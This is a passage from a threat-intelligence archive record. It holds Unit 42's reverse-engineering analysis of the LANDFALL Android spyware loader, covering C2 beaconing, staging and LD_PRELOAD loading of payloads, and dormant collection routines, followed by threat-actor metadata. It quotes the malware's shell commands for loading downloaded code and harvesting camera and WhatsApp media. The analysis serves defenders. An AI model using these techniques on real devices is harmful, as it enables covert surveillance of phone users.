(e.g., v1.5.0)\r\npid\r\neuid\r\nRunner mode\r\nIt then sends that via a POST request to the C2 server, as shown below.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 18 of 23\n\nIf the runner mode is I, it prepares the SELinux helper first: it locates the compressed policy helper\r\n(/data/data/com.samsung.ipservice/files/l), inflates it via an internal XZ decoder into a fresh buffer, and writes the\r\nresult to data/data/com.samsung.ipservice/files/l.so. Then it beacons to the C2 server by sending ping using the\r\nhyphen‑stripped agent_id as payload. The outcome doesn’t gate the rest of the flow, and it serves as an operator\r\ntelemetry.\r\nAn example of code for an I‑mode ping follows.\r\nOnly then does the main C2 beaconing loop begin. It records time zero and enforces a strict wall‑clock budget of\r\nabout 7,200 seconds (suicide_time) for the entire session.\r\nIt zeros two large, reusable path buffers: one for the raw blob that may arrive from the server, and a sibling for the\r\ndecompressed shared object. Both paths live under the app‑private working directory (e.g.,\r\n/data/data/com.samsung.ipservice/files/). With the paths ready, it contacts the command and control server by\r\nbuilding a compact, URL‑encoded style body of key=value pairs:\r\nA protocol/variant tag; the beacon message type\r\nThe agent_id, command_id and a fresh upload_id (UUIDv4) for correlation\r\nsource=bridge_head\r\nEuid\r\nThe runner flag and its on‑disk install path\r\nWhen applicable, it computes a SHA-1 over part of the message and appends it. It uses the following Chrome\r\nUser‑Agent string:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/44.0.2403.89 Safari/537.36\r\nRequests are directed at the configured base path (e.g., POST /is/ HTTP/1.0). Before any application data is sent,\r\nit pins the TLS connection.\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 19 of 23\n\nWhile reading the response from the C2 server, LANDFALL checks the response status code and looks through\r\nthe headers to determine the message length and type. Some status codes — particularly timeouts and a masked\r\nset of 4xx/5xx (e.g., 408, 504) — are treated as transient and trigger sleep(sleep_time_between_retries) (default 35\r\nseconds) before retrying with a fresh connection. A not‑found response (e.g., 404) is considered terminal for this\r\nrun and exits the loop. If the status indicates success and a body is present, LANDFALL proceeds to staging.\r\nNext-Stage Payloads\r\nStaging starts by cleaning up the file system state. If an old raw blob exists at the temporary path, it removes it. It\r\nwrites the raw bytes to a staging file named aa.so under the working directory, and then, attempts to decompress\r\nthem using a built‑in XZ/LZMA decoder that inflates into a pre‑allocated approximately 5 MiB buffer.\r\nOn success, it writes the decompressed bytes to dec_a.so (the final .so path) under the working directory, clears\r\nthe temporary aa.so and sets the file mode on dec_a.so to 777 to ensure it’s loadable in various contexts.\r\nExample XZ inflater (trimmed):\r\nWith the shared object in place (dec_a.so), it chooses an execution strategy based on the runner flag. For\r\ninteractive setups (I), it exports two environment variables and launches a benign system tool synchronously:\r\nLD_PRELOAD=\u003cfinal.so\u003e PRELOAD_PATH=/data/data/com.samsung.ipservice/files/l.so /system/bin/id\r\n(where \u003cfinal.so\u003e is dec_a.so)\r\nThe PRELOAD_PATH points at the device path where SELinux policy content is expected, allowing the\r\npreloaded code to find and apply policy at startup. Note that this PRELOAD_PATH is only used in interactive\r\nmode, the passive running path omits it.\r\nFor passive runs (P), it launches the same tool in the background:\r\nLD_PRELOAD=\u003cfinal.so\u003e /system/bin/id (with \u003cfinal.so\u003e is dec_a.so)\r\nThis is done so control returns quickly while the helper initializes in another process. Internally, both are\r\ndispatched via a shell wrapper (/system/bin/sh -c \u003ccmd\u003e). In both cases, it accepts only narrow success results:\r\nexit code 0 or a specific 0x15; anything else is treated as failure and breaks out of the loop\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 20 of 23\n\nOn successful load, it formats and sends an “ended” line mirroring the opening message including:\r\nVersion marker\r\npid\r\nincremental_build\r\nrunner\r\nIt then frees transient strings and buffers. If no payload was available, or if a transient error occurred, it checks the\r\nelapsed wall‑clock time against its approximately 7,200‑second budget. If there’s time left, it sleeps the configured\r\ninterval and tries again.\r\nFinally, when the loop finishes, either after a successful loading of the next stage or due to time budget or\r\nunrecoverable errors, it unwinds cleanly. If it is running as root, it prefers a direct _exit(status) path instead of a\r\nnormal return to minimize side effects in the runtime. In all cases, it aims to leave behind only the minimum\r\nartifacts needed for the staged code to continue.\r\nUnreferenced Capabilities\r\nDuring reverse engineering, we identified multiple routines compiled into the b.so component that are not invoked\r\nby its observed control flow. These latent features appear designed for use by the follow‑on modules loaded.\r\nIt is also very probable that some of these functions are leftovers from older versions of LANDFALL. They reveal\r\nconcrete behaviors oriented around WhatsApp media paths, DCIM discovery, file system staging and process\r\nhygiene on Android:\r\nOne routine prepares a “started” telemetry line and then interacts with the device’s media subsystem. It\r\nformats the line:\r\nBH v1.5.0 started - pid: , euid=, incremental_build: v1.5.0, runner:\r\nIf its internal checks pass, it executes a broadcast to force a gallery rescan using the exact shell:\r\nam broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d\r\nfile:///sdcard/DCIM/hacked.jpg\r\nIn the same flow, it also constructs a “newest photo” probe over DCIM using:\r\nfind /sdcard/DCIM -type f -exec ls -t1 {} + | grep -v hacked| head -1\r\nThis pattern is consistent with harvesting the latest camera item while excluding an artifact it can\r\nplant. This routine is compiled in but not called by any other code in the sample.\r\nWhatsApp media path planter. Another routine decodes a hard-coded Base64 1x1 PNG\r\n(iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ…JRU5ErkJggg==) and searches\r\nWhatsApp’s media directories on external storage for a recent file path that matches the agent’s identifier\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 21 of 23\n\n(the UUID is first stripped of hyphens). It builds and executes a search pipeline across both default (ID 0)\r\nand multi‑user (ID 95) paths:\r\nfind /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/\r\n/storage/emulated/95/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/ -type f -\r\natime -720m -maxdepth 1 -exec grep -lo '.*\u003cagentIdNoHyphens\u003e.*' {} \\; -quit 2\u003e/dev/null.\r\nIf such a path is returned, it writes the decoded PNG there verbatim. This looks like a cover‑artifact\r\nor covert marker stage aimed at WhatsApp images.\r\nAnother helper takes a base directory and a string and returns one matching JPEG path by executing:\r\nfind \u003cbase\u003e -name '*.jpg' -exec grep -le '.*\u003cpattern\u003e.*' {} \\;\r\nIt trims trailing newlines and verifies the path exists before returning.\r\nZygote avoidance check: A process‑hygiene helper allocates a buffer for its own cmdline and returns\r\nsuccess only when the name does not match zygote or zygote64. It is designed to avoid Android’s special\r\nhost processes.\r\nSELinux symbol resolver and cleanup: Two small routines handle dynamic SELinux plumbing.\r\nOne dlopens /system/lib64/libselinux.so and resolves getfilecon and setfilecon into global function\r\npointers.\r\nThe other tears this down and clears the pointers.\r\nBoth exist to support policy/file‑context work but are not referenced by the observed code path.\r\nA more substantial routine accepts a list of file system paths. For each, it saves the current label via\r\ngetfilecon, invokes an internal labeler on the path, applies ownership via chown and then restores the saved\r\nlabel with setfilecon. It returns distinct negative codes when chown or setfilecon fail.\r\nThere is a file probe that attempts to open a path and maps the outcome to internal status codes (success,\r\npermission denied, not found, generic error). It also resets internal library state (including any previously\r\nopened SELinux handles).\r\nMap process‑execution outcome to message status: A tiny mapper converts the result of an internal\r\ncommand‑execution helper into message catalog codes (e.g., mapping a specific return (1) to\r\nCMD_STAT_* code 0x0C and 2–3 to 0x51). It standardizes reporting for helpers but is not reached by the\r\ncurrent logic.\r\nBuilding a device‑report JSON array: Another dormant routine constructs a cJSON array where each entry\r\ncarries device_path, a Base64‑encoded binary field, a last_updated boolean and a textual state derived from\r\nthe internal CMD_STAT_* table. It walks an input vector, reads the referenced file into memory, Base64\r\nencodes it and appends to the array.\r\nA small string‑templating helper finds occurrences of the token --working_dir-- inside a JSON value and\r\nreplaces them with the runtime path tracked by the b.so.\r\nAppending TracerPid to telemetry: A diagnostic helper parses /proc/self/status, extracts the TracerPid line,\r\nconverts it to an integer, and, if greater than zero, appends a formatted key/value into the request body via\r\nthe b.so’s string‑builder.\r\nA staging helper concatenates an existing buffer with a pseudo‑random block derived from an input string:\r\nIt seeds a byte with rand()\r\nIt XORs each subsequent byte of the input into a rolling accumulator\r\nIt writes the accumulator bytes as a suffix\r\nIt then writes the combined buffer to a given file path via the b.so’s writer\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 22 of 23\n\nA two‑step installer/uninstaller pair uses three config keys: persistency_origin, persistency_payload and\r\npersistency_backup. The main routine checks that all three are set, copies the backup back to the origin if\r\nneeded and then deletes the payload file. It returns distinct status codes (0x4B/0x4C/0x4D) that map to the\r\nmessage catalog entries for “no config,” “failed move” and “failed unlink.” A sibling routine conditionally\r\ncreates or truncates the backup file (fopen with mode “w”) when a global persistence flag is set.\r\nBattery percentage via sysfs: A utility reads battery capacity from the system’s power‑supply sysfs,\r\nchecking two common locations: /sys/class/power_supply/battery/capacity and\r\n/sys/class/power_supply/Battery/capacity.\r\nTwo routines set up and finalize the working directory under app‑private storage.\r\nThe first creates the directory tree, applies mode 0771 (0x1F9), temporarily adds execute to the\r\nparent and copies the resolved path into config. And, when running as root, it attempts to mount a\r\ntmpfs at that location to keep artifacts in memory\r\nThe second (cleanup/finalize) can, when root and the directory exists, run lsof | grep \u003cworking_dir\u003e\r\nand ship the result home. It then restores the parent directory’s original mode and frees the path\r\nbuffer\r\nProcess discovery by SELinux context and by cmdline: Two search helpers iterate /proc, building and\r\nreading per‑PID files.\r\nOne compares /proc/%d/attr/current against a target SELinux context and then confirms the process\r\nhas PPID 1\r\nThe other compares /proc/%d/cmdline against a target cmdline\r\nOn a match, they write the PID to an out‑parameter and return success\r\nDebug‑printing a variant array: A developer‑facing routine prints a small typed array structure. It formats\r\ntype names from a table, dumps short byte arrays inside square brackets and emits a single character for a\r\nspecific type, one element per line. This looks like leftover debugging and is not invoked by active code.\r\nNone of these helpers are exercised by this component’s main execution loop. Their presence is consistent with a\r\nstaged architecture in which subsequently loaded shared objects, forming the complete LANDFALL framework,\r\nexpand collection and persistence using capabilities already compiled into this loader.\r\nSource: https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nhttps://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/" ], "report_names": [ "landfall-is-new-commercial-grade-android-spyware" ], "threat_actors": [ { "id": "0f47a6f3-a181-4e15-9261-50eef5f03a3a", "created_at": "2022-10-25T16:07:24.228663Z", "updated_at": "2026-04-10T02:00:04.905195Z", "deleted_at": null, "main_name": "Stealth Falcon", "aliases": [ "FruityArmor", "G0038", "Project Raven", "Stealth Falcon" ], "source_name": "ETDA:Stealth Falcon", "tools": [ "Deadglyph", "StealthFalcon" ], "source_id": "ETDA", "reports": null }, { "id": "77aedfa3-e52b-4168-8269-55ccec0946f7", "created_at": "2023-01-06T13:46:38.453791Z", "updated_at": "2026-04-10T02:00:02.981559Z", "deleted_at": null, "main_name": "Stealth Falcon", "aliases": [ "FruityArmor", "G0038" ], "source_name": "MISPGALAXY:Stealth Falcon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bd084d2f-4233-49b1-b0e6-c7011178dae0", "created_at": "2022-10-25T15:50:23.544316Z", "updated_at": "2026-04-10T02:00:05.325921Z", "deleted_at": null, "main_name": "Stealth Falcon", "aliases": [ "Stealth Falcon" ], "source_name": "MITRE:Stealth Falcon", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "b8c7c542-43ed-498c-af6b-b4b5f0c75724", "created_at": "2024-02-02T02:00:04.026045Z", "updated_at": "2026-04-10T02:00:03.529714Z", "deleted_at": null, "main_name": "Carmine Tsunami", "aliases": [ "DEV-0196", "QuaDream" ], "source_name": "MISPGALAXY:Carmine Tsunami", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434723, "ts_updated_at": 1775791846, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.pdf", "text": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.txt", "img": "https://archive.orkl.eu/864f9d59af4b4b84b8ed7675fe8dd02a4ddd42a6.jpg" } }